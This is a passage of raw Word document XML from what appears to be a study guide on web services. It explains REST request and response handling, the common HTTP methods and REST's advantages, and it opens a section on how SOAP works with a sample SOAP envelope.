          <w:numId w:val="1771"/>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The server processes the request, retrieves the resource or performs the action, and prepares the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7557D86E" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1771"/>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The server may consult databases, external services, or other resources to fulfill the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616F6EF" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1771"/>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Server Response</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C1C24" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1771"/>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The server sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>representation</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the resource or the result of an action (e.g., a JSON object, XML document) back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA091CE" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1771"/>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The response includes </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>status codes</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicating the outcome of the request (e.g., 200 OK, 404 Not Found, 201 Created).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54066812" w14:textId="77777777" w:rsidR="00030141"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DAC671E">
          <v:rect id="_x0000_i1953" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D36B62" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common HTTP Methods in REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB5736" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1772"/>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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieve a resource from the server (e.g., GET /users/1 to get user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD6678" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1772"/>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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a new resource on the server (e.g., POST /users to create a new user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0D7BE" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1772"/>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PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Update an existing resource on the server (e.g., PUT /users/1 to update user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F517F2B" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1772"/>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DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Remove a resource from the server (e.g., DELETE /users/1 to delete a user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24888B16" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1772"/>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PATCH</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partially update a resource (e.g., PATCH /users/1 to partially update user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C8537" w14:textId="77777777" w:rsidR="00030141"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9FCB8A5">
          <v:rect id="_x0000_i1954" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F47A1" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST Architecture Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108BAB41" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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Client &lt;-&gt; Server (via HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935A631" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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                ↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A358DDF" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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Request           Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390AFAD" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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                ↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B06FDE" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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HTTP Methods (GET, POST, PUT, DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC06067" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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                ↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F3791" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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Resource (e.g., /users, /products)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43A1F2" w14:textId="77777777" w:rsidR="00030141"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F448E78">
          <v:rect id="_x0000_i1955" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA8ACE2" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advantages of REST Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD507D" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1773"/>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Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Due to statelessness, REST APIs scale well as each request is independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505A4F2" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1773"/>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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching can improve performance and reduce network load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495DA70" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1773"/>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lastRenderedPageBreak/>
        <w:t>Simplicity</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using standard HTTP methods and statuses makes REST easy to implement and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9E4B6" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1773"/>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Interoperability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: REST APIs can be consumed by any client (e.g., browsers, mobile apps, other servers) that can make HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7F4DB" w14:textId="77777777" w:rsidR="00030141" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0003014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41A8D9A">
          <v:rect id="_x0000_i1956" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25291BB9" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="00CE4B95" w:rsidRDefault="000B328B" w:rsidP="000B328B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="_Toc196307876"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does SOAP work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="396"/>
    </w:p>
    <w:p w14:paraId="2818BCBC" w14:textId="731AE949" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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SOAP (Simple Object Access Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a protocol used for exchanging structured information in the implementation of web services. It relies on XML-based messaging and is platform-independent. SOAP allows applications running on different operating systems to communicate with each other over a network, typically via HTTP or SMTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D307E" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How SOAP Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0A3475" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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SOAP Request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B2872" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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A client sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server, typically over HTTP, although other transport protocols such as SMTP can be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B833F" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The SOAP request is an XML message that follows the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP envelope</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> format. It contains the information needed for the request, such as the operation to be invoked and any required parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06B597" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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SOAP Envelope</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The SOAP message is structured in a specific way using the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP envelope</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The envelope is the outermost element in the message and encapsulates all parts of the message, including the header and the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65715A6A" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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Envelope</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The root element of a SOAP message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A67850" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An optional element that contains metadata (such as authentication, transaction, or routing information). Headers are not always required and are typically used for special processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35626CCE" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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Body</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The mandatory part of the SOAP message, where the actual request or response data is placed. It contains the call to the web service method along with any parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF4E937" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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SOAP Message Format</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A SOAP message typically looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3964F" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA1870" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F183BF6" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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xmlns:web="http://example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0F37B" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849887B" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805A582" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:getBookDetails&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB495C" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:bookId&gt;12345&lt;/web:bookId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A4629" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:getBookDetails&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2508F" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C696A98" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B3198" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The &lt;soapenv:Envelope&gt; defines the XML namespace and is the root element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A6F08" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The &lt;soapenv:Header&gt; is optional and can contain header information like authentication or logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00226572" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The &lt;soapenv:Body&gt; contains the actual request data or the operation to be invoked (in this case, a getBookDetails operation with a bookId parameter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A6A3B" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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SOAP Server Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
